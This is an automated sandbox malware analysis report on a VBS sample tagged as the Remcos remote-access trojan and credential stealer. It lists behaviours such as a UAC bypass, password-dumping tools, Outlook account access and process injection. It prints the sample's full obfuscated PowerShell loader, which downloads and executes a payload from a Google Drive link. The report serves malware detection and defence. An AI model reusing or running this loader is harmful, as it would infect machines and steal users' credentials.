Malware Analysis Report

2025-04-03 14:14

Sample ID 241105-c4at1ssfnh
Target 36b44229a81fa005512ea72195083c77844fbd5339c7afb9eaea4505774c1753.vbs
SHA256 36b44229a81fa005512ea72195083c77844fbd5339c7afb9eaea4505774c1753
Tags
remcos remotehost collection credential_access discovery evasion rat stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

36b44229a81fa005512ea72195083c77844fbd5339c7afb9eaea4505774c1753

Threat Level: Known bad

The file 36b44229a81fa005512ea72195083c77844fbd5339c7afb9eaea4505774c1753.vbs was found to be: Known bad.

Malicious Activity Summary

remcos remotehost collection credential_access discovery evasion rat stealer trojan

UAC bypass

Remcos

Remcos family

NirSoft MailPassView

Detected Nirsoft tools

NirSoft WebBrowserPassView

Uses browser remote debugging

Blocklisted process makes network request

Checks computer location settings

Legitimate hosting services abused for malware hosting/C2

Accesses Microsoft Outlook accounts

Suspicious use of NtCreateThreadExHideFromDebugger

Suspicious use of SetThreadContext

Suspicious use of NtSetInformationThreadHideFromDebugger

Enumerates physical storage devices

System Location Discovery: System Language Discovery

Modifies registry key

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Enumerates system info in registry

Suspicious use of FindShellTrayWindow

Modifies registry class

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Suspicious use of SetWindowsHookEx

Suspicious behavior: MapViewOfSection

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-05 02:37

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-05 02:37

Reported

2024-11-05 02:40

Platform

win7-20240708-en

Max time kernel

150s

Max time network

125s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\36b44229a81fa005512ea72195083c77844fbd5339c7afb9eaea4505774c1753.vbs"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WScript.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\36b44229a81fa005512ea72195083c77844fbd5339c7afb9eaea4505774c1753.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Unshadow Teia Translated Trumbash Kommiserne Unorational Zea #>;$Kadence='Metricizes';<#Tndende Confiserie Tnkningers #>; function Condonement($Bedimple){If ($host.DebuggerEnabled) {$Subcaptaincy++;}$Sydhavnen=$Underdelene+$Bedimple.'Length' - $Subcaptaincy; for ( $Speedbaadenes=4;$Speedbaadenes -lt $Sydhavnen;$Speedbaadenes+=5){$Dispositionernes=$Speedbaadenes;$Tensaw+=$Bedimple[$Speedbaadenes];}$Tensaw;}function Begejstret($renotification){ & ($Proparent) ($renotification);}$Chloride=Condonement 'HartMSkrioProczbjeri S.hlbldnl.siaaProd/ an ';$Centralenhedens=Condonement ',ulpTBi.olUdlss Acy1Pjec2m,ld ';$Uhyrernes='Mono[CuraNAfkrET rntCrim.HuxlSMultEReinR TvrvPhotIBremCswalEBehypFuseo silIF.den HomtDiscM mmua tednSkriA yrpG koeTexaR Bef]Naad:Unde:EvidS KeneAm rCTaasURekoRskrai U atthrayQuadP PetrExp.OLinjTUni,O TilcInd.oCrouLBemr=Lipp$PryeCSob,ED gtnTeletSkudrEfteA humLSpasEDec,NH unhcoryeEkspD Ly,eslvpNt beS th ';$Chloride+=Condonement 'Symp5Jens.Beri0Hjpa F r(Ski,W Adei Cehn FeddEf eobandwOutgsFa.l godtNHernTS gt Sia,1O er0Hv s.,emi0Ords;Dege NedWMismi ysnCon 6Besy4Unco;Re.a Fdevxskra6 non4indl;Ku,i AnafrN ntvSurl:Brut1bowm3Sign1M.na.Butt0Geo.)Outg Mi rG PhieSkatc AchkDis o Aph/ ele2glar0Stem1Poch0Akko0Ant,1Supe0Fulg1St n UhelF UgyiDis.rEfteeFi ofBa voAnlgxEne,/Draw1Fase3Opva1Sad .Auro0Unga ';$Metred=Condonement 'SemiUPolySslkkeKvisrGent-IsenatilegRi pE arbn.erit ide ';$Staveren=Condonement ' Pyrh inktIn etLocapUnsts Cut:D wy/rest/ApprdAflerGeopiUltrvTeeneWitt.BisogcadooNonpoSkovg FedlStopeInds.EphycTrbeoEpitmH ut/ dkluWinzcPlan? ZooePharx UdnpForboAfvrrNemmtSp d=Exi drep.o ,rawEnernPhenlAh aoS rraFrihd Flh& Divi NondKa.e=Imme1 LovDJuicYR.ak3OphaH ron_t in3Ca oZTermOLen OUn.cHElapuForm_ BruyPermw FrspAfmaR Fa,erhomCPompYJe ur BrecWee HApprn Re Z edsADimsv lutxAzurbInteBTremNProggLuniL Rub ';$sprogtalentets=Condonement 'Farv>Brit ';$Proparent=Condonement 'CongIHy,pe U mXSalg ';$Snowfield='Phonoreceptor';$Speedbaadenesnfiltrede='\Kbstadboerne8.tid';Begejstret (Condonement 'Buni$RaseGpennLSoteOBalsBT ikAUn slFrug:Rumft sseiDdslLBlanTTracaSoc lAllaESk bnS.ja=mrkb$E.treTretnOvicvH,ct:TjenaXantpGalvP voudErytA.hatt ReaaEb i+Lava$ParasImpepBdetESy aeKsesD FisbBullA A mA PaaDArbeeAn tnS.onE,ordSMu in,trufDic,I KosLSit t UnsRRim.EP stdKa,mE kan ');Begejstret (Condonement ' m.r$DalegApriLRaadoompoBSup,a S rlSylp:GratTRe,irH ndaPos fsejlinaviK Dipf SafL UnfY upEPa enChroe RecSFul =Sten$MesosFlelTBefoAMetovErnreS.torNoneeSympN G.y.AskaS kspDeo L ramITutrtCert(R nt$Dotis Ov PHa vRDeteoAl nGKrysTSn,bABa yLfantEWarnNArtit .uneA,tethonnS for) po ');Begejstret (Condonement $Uhyrernes);$Staveren=$trafikflyenes[0];$Blea15=(Condonement 'Bred$PaadgbuddlTra OFormB p ea Yumlinac:For N BegAEulor MatRErnr=Def.n LeveBartW Gal-T,llo PlabBacoj S,deK nocExcot K l Est,s S rYComps Re,tBrideBreeMLivm. T lNProfEFurot Tan.NortWEdi E ompBHospcStadlSme IU lieCha NModuT Sel ');Begejstret ($Blea15);Begejstret (Condonement 'Kris$UdviNAutoaBannrStanr Gla.scytHpreoeEguraAxmidP gheS.agrSupesUlce[Ca e$CompM TubeE.ketReflrNyanehalvdV,ri] Tea= ael$ AdmCTendh KrolNeuro odrP neihustd De.eKar, ');$Strikvarers=Condonement 'Bai,$PalaNPul aRinnr UnprPlum.IkenDIlteo GenwChevnVrv lBakho myaDispdGe,sFFet iAberl illePens(G,pe$For SStopt Snaa envRouteE sir ReneStv.nPho ,St.l$ IliCSvo,aQuesrOvercReinoNo.coprisnHlqn) G r ';$Carcoon=$Tiltalen;Begejstret (Condonement ' mad$ TanGTrykLhjtiOmo obStryACortlpira:u vls Fo.EFimbm ifaaT kssRafeiTreeoN.nslCom o upeg veryFert= Tro(SawatMantePampsIndtT.oen-TidspSynkafa,bTF.ldHStar Dune$KragC Ph,aBackr Sd CDetooZincoFo.mnSel,) Ven ');while (!$Semasiology) {Begejstret (Condonement 'Hi h$Fra gSanslBarooAvlebDi haKon.lEfte:BktaEMngdk e osAfgiaOpfimHo ei ryonHijaaKocmt siooprinrStrueNonwrForesStup=Hono$ SputUd ar rusuBenfe Gri ') ;Begejstret $Strikvarers;Begejstret (Condonement 'SwedSVareT NytaRefoRRaketCoun-PrecS rnlU gaE HanEVirkPBi.e Ske 4Galm ');Begejstret (Condonement ' Out$ SupgPr dlMuddoSid bstenAOve LEne.: Fa S UnyeCataMNonaaDi csRu siBlanoOplul PugoMorbGMappy pid=Isep(Corrt Wa.EPersSP,iot Flo- punPRypeaNonrt rieHstni ve e$Coopc angaTr wRAutoCS,dnO O,ko m nnAtta)Kata ') ;Begejstret (Condonement ' L n$ W rgEfteL heOSur BB keArutsl Ref: A tPfa tOFresl ReiIO,tit AtiB.ummUWeatrKlubEFlorAAandUUnpeE Da.ROprasSvkk=Wood$Imp,GChuflRastO mbob CirA,topL und: ForUShyur De.aPh nNChorBUdipe PhorUnprIKonfgB,useAfklLbierSi onE Amp+Chil+Fl.r% ent$SomntfuglRDetaAValufPathiKonsKSweefBlitlEgotyreume SulNsam ESte,SHypn. ogpc akoO RedU rsen S pTPseu ') ;$Staveren=$trafikflyenes[$Politbureauers];}$Tilforladeligere=298086;$Racercyklernes=30728;Begejstret (Condonement 'S,if$DepaGSamlL N uOParab oveACol.LSlag:TabeGOrthrJazze.ardngocaa onAantheBrnenKjorS syeWee R I.f om=Nee HangatheE ContClou-Co vCVarmOBogmn P,ttPreteKaffnB nktBill Bo y$ H,ecM siAConfrTe,tcYo ioHostoApe,NType ');Begejstret (Condonement ' on$ UrrgstbelOveroTannbOveraBarsl P o:DdspCStaroGra.l estl GngiThrecPourl Ey eChar Gasf=i,ma akra[ NonSImmoy irs Hypt unaeFyrrmGa.o. allCU tro OphnSiddvKo.keKlavrAttat Ar ]Frem:Trev:HoejFK rrr Bero opmm eguBC tca KapsApinevejr6Rein4SkriSEpittPaulr EuliHovenStamgLuft(Styr$,ishg sodr RaneE tenGeekaFlova RiseOmsknBiassSvrmeRestrDeco)Unin ');Begejstret (Condonement 'Skue$ SinGStviL Soco BinBUnorAS alLU,de:BaltS jerHSdrra ,idF,kroTNeug Fran=kart Form[PostsNondy RidspulvtTe te isMSeri.KonstDistECo kxhaa tPun .Dip EEkspn Musc FyrOSjledDagbIUn unShe gMod,] nlg: ,tn: CruAU.grs olacEctrIFo bI kla. Sk gRehaeconct MucsAn it.tudRH poIM.idNSpeag Rou(Ind,$ S.lcMonoO AdeLSpydlDet.I F rCFalsl Sp eBid ) Tr ');Begejstret (Condonement 'Hand$,ockgGra lunifoKy.ebTilba agslTesc: ConsBestaNeglls neR.ram= Res$SpadsB hoHTil,a errFmoldTAver. PasSE ilUSlvsB neqsFritTEdu RBemyI DupN.antgProl(Kryp$SkeptBrn iJ hnLSjlefVensOFotoRana,LreedaLancDQua E tjel BehIOmdeGPrebEo terVa,ueGodm,Opha$M,narHackAHospC andesup ROmgrC.atryG arkBlodlHe teInt RVandNJoulesterS Gra) Di, ');Begejstret $salr;"

Network

Files

C:\Users\Admin\AppData\Local\Temp\Cab8C0C.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

memory/2268-20-0x000007FEF58FE000-0x000007FEF58FF000-memory.dmp

memory/2268-22-0x0000000002390000-0x0000000002398000-memory.dmp

memory/2268-21-0x000000001B6B0000-0x000000001B992000-memory.dmp

memory/2268-23-0x000007FEF5640000-0x000007FEF5FDD000-memory.dmp

memory/2268-24-0x000007FEF5640000-0x000007FEF5FDD000-memory.dmp

memory/2268-25-0x000007FEF5640000-0x000007FEF5FDD000-memory.dmp

memory/2268-26-0x000007FEF5640000-0x000007FEF5FDD000-memory.dmp

memory/2268-27-0x000007FEF5640000-0x000007FEF5FDD000-memory.dmp

memory/2268-28-0x000007FEF58FE000-0x000007FEF58FF000-memory.dmp

memory/2268-29-0x000007FEF5640000-0x000007FEF5FDD000-memory.dmp

memory/2268-30-0x000007FEF5640000-0x000007FEF5FDD000-memory.dmp

memory/2268-31-0x000007FEF5640000-0x000007FEF5FDD000-memory.dmp

memory/2268-32-0x000007FEF5640000-0x000007FEF5FDD000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-05 02:37

Reported

2024-11-05 02:40

Platform

win10v2004-20241007-en

Max time kernel

148s

Max time network

148s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\36b44229a81fa005512ea72195083c77844fbd5339c7afb9eaea4505774c1753.vbs"

Signatures

Remcos

rat remcos

Remcos family

remcos

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A

Detected Nirsoft tools

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

NirSoft MailPassView

Description Indicator Process Target
N/A N/A N/A N/A

NirSoft WebBrowserPassView

Description Indicator Process Target
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Accesses Microsoft Outlook accounts

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts C:\Windows\SysWOW64\msiexec.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3252 set thread context of 1748 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 3252 set thread context of 2920 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 3252 set thread context of 4604 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3664 wrote to memory of 1996 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3664 wrote to memory of 1996 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1516 wrote to memory of 3252 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\msiexec.exe
PID 1516 wrote to memory of 3252 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\msiexec.exe
PID 1516 wrote to memory of 3252 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\msiexec.exe
PID 1516 wrote to memory of 3252 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\msiexec.exe
PID 3252 wrote to memory of 3468 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\cmd.exe
PID 3252 wrote to memory of 3468 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\cmd.exe
PID 3252 wrote to memory of 3468 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\cmd.exe
PID 3468 wrote to memory of 3060 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3468 wrote to memory of 3060 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3468 wrote to memory of 3060 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3252 wrote to memory of 1092 N/A C:\Windows\SysWOW64\msiexec.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 3252 wrote to memory of 1092 N/A C:\Windows\SysWOW64\msiexec.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1092 wrote to memory of 624 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1092 wrote to memory of 624 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1092 wrote to memory of 2356 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1092 wrote to memory of 2356 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1092 wrote to memory of 2356 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1092 wrote to memory of 2356 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1092 wrote to memory of 2356 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1092 wrote to memory of 2356 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1092 wrote to memory of 2356 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1092 wrote to memory of 2356 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1092 wrote to memory of 2356 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1092 wrote to memory of 2356 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1092 wrote to memory of 2356 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1092 wrote to memory of 2356 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1092 wrote to memory of 2356 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1092 wrote to memory of 2356 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1092 wrote to memory of 2356 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1092 wrote to memory of 2356 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1092 wrote to memory of 2356 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1092 wrote to memory of 2356 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1092 wrote to memory of 2356 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1092 wrote to memory of 2356 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1092 wrote to memory of 2356 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1092 wrote to memory of 2356 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1092 wrote to memory of 2356 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1092 wrote to memory of 2356 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1092 wrote to memory of 2356 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1092 wrote to memory of 2356 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1092 wrote to memory of 2356 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1092 wrote to memory of 2356 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1092 wrote to memory of 2356 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
